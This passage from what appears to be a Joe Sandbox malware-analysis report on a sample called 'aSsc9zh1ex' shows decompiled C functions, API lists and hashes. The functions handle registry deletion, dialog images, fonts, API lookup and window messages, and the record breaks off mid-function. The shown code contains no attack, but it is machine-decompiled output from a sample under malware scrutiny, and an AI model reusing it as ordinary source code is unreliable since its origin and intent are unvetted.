                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4216380887-0
                                                                                                                              • Opcode ID: 540107765aafc3c8a230370bd89d1c22124a8442e0ca18c789e7308447dc7fdd
                                                                                                                              • Instruction ID: f882deed87f39854cd538b02e982895799c2865479dfd642376ece0e88ae8267
                                                                                                                              • Opcode Fuzzy Hash: 540107765aafc3c8a230370bd89d1c22124a8442e0ca18c789e7308447dc7fdd
                                                                                                                              • Instruction Fuzzy Hash: 714102B0008705EFFB14FF28D980B2A77F8FB56315F108A2EE54A87181E734A554CB69
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 48%
                                                                                                                              			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E00406387(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E004068E7(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                                                                                                              0x00402eb4
                                                                                                                              0x00402ebd
                                                                                                                              0x00402ec6
                                                                                                                              0x00402ed2
                                                                                                                              0x00402edb
                                                                                                                              0x00402ee5
                                                                                                                              0x00402f0a
                                                                                                                              0x00402f10
                                                                                                                              0x00402f15
                                                                                                                              0x00402f16
                                                                                                                              0x00402f46
                                                                                                                              0x00402f1f
                                                                                                                              0x00402f21
                                                                                                                              0x00402f71
                                                                                                                              0x00402f74
                                                                                                                              0x00000000
                                                                                                                              0x00402f7a
                                                                                                                              0x00402f30
                                                                                                                              0x00402f35
                                                                                                                              0x00402f37
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402f3f
                                                                                                                              0x00402f44
                                                                                                                              0x00402f45
                                                                                                                              0x00402f45
                                                                                                                              0x00402f52
                                                                                                                              0x00402f5a
                                                                                                                              0x00402f61
                                                                                                                              0x00000000
                                                                                                                              0x00402f8a
                                                                                                                              0x00000000
                                                                                                                              0x00402f69
                                                                                                                              0x00402ef5
                                                                                                                              0x00402f08
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00402f08
                                                                                                                              0x00402f90

                                                                                                                              APIs
                                                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402EFD
                                                                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                                                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseEnum$DeleteValue
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1354259210-0
                                                                                                                              • Opcode ID: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                              • Instruction ID: c11aca49d0effc85046ccc9aadc56b913b01f210672418aaa5aa9f4d8e4c938e
                                                                                                                              • Opcode Fuzzy Hash: 78d35a7524f1d2205fa0e87ab22fa6bfb41dfe8b1a27fd9ec563711b6eb4cb1f
                                                                                                                              • Instruction Fuzzy Hash: 8C212A7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21A0D7B59E54AA68
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8a60,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E00406461();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                                                                                                              0x00401d81
                                                                                                                              0x00401d85
                                                                                                                              0x00401d9a
                                                                                                                              0x00401d87
                                                                                                                              0x00401d89
                                                                                                                              0x00401d8f
                                                                                                                              0x00401d8f
                                                                                                                              0x00401da0
                                                                                                                              0x00401da3
                                                                                                                              0x00401dad
                                                                                                                              0x00401db0
                                                                                                                              0x00401db8
                                                                                                                              0x00401dc9
                                                                                                                              0x00401dcc
                                                                                                                              0x00401dd7
                                                                                                                              0x00401dce
                                                                                                                              0x00401dd0
                                                                                                                              0x00401dd0
                                                                                                                              0x00401ddb
                                                                                                                              0x00401de5
                                                                                                                              0x00401e0c
                                                                                                                              0x00401e1b
                                                                                                                              0x00401e29
                                                                                                                              0x00401e31
                                                                                                                              0x00401e39
                                                                                                                              0x00401e39
                                                                                                                              0x00401e42
                                                                                                                              0x00401e48
                                                                                                                              0x00402ba4
                                                                                                                              0x00402ba4
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1849352358-0
                                                                                                                              • Opcode ID: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                                                                                                                              • Instruction ID: 28669104e63112c2688ec1bf4ccd66a2dfd92d91aff3cd1988410ea650e2814b
                                                                                                                              • Opcode Fuzzy Hash: 132564bbd8200f7e0b28f89bf5610b7946a6e505595dff695356bd6c1208d134
                                                                                                                              • Instruction Fuzzy Hash: 1721F672D04119AFCB05DBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 73%
                                                                                                                              			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdc8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40cdd8 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40cddf = 1;
				 *0x40cddc = _t15 & 0x00000001;
				 *0x40cddd = _t15 & 0x00000002;
				 *0x40cdde = _t15 & 0x00000004;
				E00406557(_t9, _t31, _t33, 0x40cde4,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdc8);
				_push(_t18);
				_push(_t31);
				E00406461();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                                                                              0x00401e4e
                                                                                                                              0x00401e59
                                                                                                                              0x00401e5b
                                                                                                                              0x00401e68
                                                                                                                              0x00401e7f
                                                                                                                              0x00401e84
                                                                                                                              0x00401e91
                                                                                                                              0x00401e96
                                                                                                                              0x00401e9a
                                                                                                                              0x00401ea5
                                                                                                                              0x00401eac
                                                                                                                              0x00401ebe
                                                                                                                              0x00401ec4
                                                                                                                              0x00401ec9
                                                                                                                              0x00401ed3
                                                                                                                              0x00402638
                                                                                                                              0x0040156d
                                                                                                                              0x00402ba4
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                                                • Part of subcall function 00406557: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004066FC
                                                                                                                                • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                                                                                                                              • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401ED3
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2584051700-0
                                                                                                                              • Opcode ID: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                                                                                                              • Instruction ID: 0d45dbb9e622ade016cb62109ac663f1c9afcfae21dbc147df73c93619ae97e2
                                                                                                                              • Opcode Fuzzy Hash: 80dbc2b2fae4c7c566210f3db186a97745b6b4268190bf82bcd042cd3ccc65f3
                                                                                                                              • Instruction Fuzzy Hash: 6401D871940641EFEB006BB4AE89BDA3FB0AF15301F10493AF141B61D2C6B90404DB2C
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 6F0016BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E6F0016BD(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}






                                                                                                                              0x6f0016d7
                                                                                                                              0x6f0016e3
                                                                                                                              0x6f0016f0
                                                                                                                              0x6f0016f7
                                                                                                                              0x6f001700
                                                                                                                              0x6f00170c

                                                                                                                              APIs
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6F0022D8,?,00000808), ref: 6F0016D5
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6F0022D8,?,00000808), ref: 6F0016DC
                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6F0022D8,?,00000808), ref: 6F0016F0
                                                                                                                              • GetProcAddress.KERNEL32(6F0022D8,00000000), ref: 6F0016F7
                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 6F001700
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41989007349.000000006F001000.00000020.00000001.01000000.00000004.sdmp, Offset: 6F000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41988874344.000000006F000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989151475.000000006F004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41989215917.000000006F006000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_6f000000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1148316912-0
                                                                                                                              • Opcode ID: 8ab426fa803d7fab3b194d9963812a8f27ab327ba5be5eed31aba5cedff6e6cd
                                                                                                                              • Instruction ID: 1a9d3d5b9e6c5c9741759947b140b5e8c2305d49ffafc3c7ce5abf72e9b1b4e8
                                                                                                                              • Opcode Fuzzy Hash: 8ab426fa803d7fab3b194d9963812a8f27ab327ba5be5eed31aba5cedff6e6cd
                                                                                                                              • Instruction Fuzzy Hash: DBF01C762065387BDA2027A68C4CC9BBE9CEF9B3F5B110215F728A21A0C6714C11E7F9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 59%
                                                                                                                              			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E00406461();
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                                                                                              0x00401c43
                                                                                                                              0x00401c45
                                                                                                                              0x00401c4c
                                                                                                                              0x00401c4f
                                                                                                                              0x00401c52
                                                                                                                              0x00401c5c
                                                                                                                              0x00401c60
                                                                                                                              0x00401c63
                                                                                                                              0x00401c6c
                                                                                                                              0x00401c6c
                                                                                                                              0x00401c6f
                                                                                                                              0x00401c73
                                                                                                                              0x00401c7c
                                                                                                                              0x00401c7c
                                                                                                                              0x00401c7f
                                                                                                                              0x00401c83
                                                                                                                              0x00401c85
                                                                                                                              0x00401cda
                                                                                                                              0x00401cdc
                                                                                                                              0x00401ce7
                                                                                                                              0x00401cf1
                                                                                                                              0x00401cf4
                                                                                                                              0x00401cf4
                                                                                                                              0x00401cfd
                                                                                                                              0x00000000
                                                                                                                              0x00401c87
                                                                                                                              0x00401c8e
                                                                                                                              0x00401c90
                                                                                                                              0x00401c93
                                                                                                                              0x00401c99
                                                                                                                              0x00401ca0
                                                                                                                              0x00401ca3
                                                                                                                              0x00401ccb
                                                                                                                              0x00401d03
                                                                                                                              0x00401d03
                                                                                                                              0x00401ca5
                                                                                                                              0x00401cb3
                                                                                                                              0x00401cbb
                                                                                                                              0x00401cbe
                                                                                                                              0x00401cbe
                                                                                                                              0x00401ca3
                                                                                                                              0x00401d06
                                                                                                                              0x00401d09
                                                                                                                              0x00401d0f
                                                                                                                              0x00402ba4
                                                                                                                              0x00402ba4
                                                                                                                              0x00402c2d
                                                                                                                              0x00402c39

                                                                                                                              APIs
                                                                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.41959952306.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.41959904662.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960027525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41960080093.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961705865.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961753112.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961803590.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41961843116.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962021828.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962062973.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962107808.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962161287.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962210692.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962256309.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.41962332064.00000000007D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$Timeout
                                                                                                                              • String ID: !
                                                                                                                              • API String ID: 1777923405-2657877971
                                                                                                                              • Opcode ID: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                                                                                                                              • Instruction ID: f7a68e929e996113dc281fa05a4685e5ce16b579df1de56e4cd617e501a9a943
                                                                                                                              • Opcode Fuzzy Hash: 7bcf9f063f3f8c1cd6765bc74cbc29e805e6a9181adc19e22c18985f917a49b0
                                                                                                                              • Instruction Fuzzy Hash: 90219C7190421AEFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00404D23 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E00404D23(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E00406557(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E00406557(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E00406557(_t44, _t50, 0x7a1f48, 0x7a1f48, _a8);
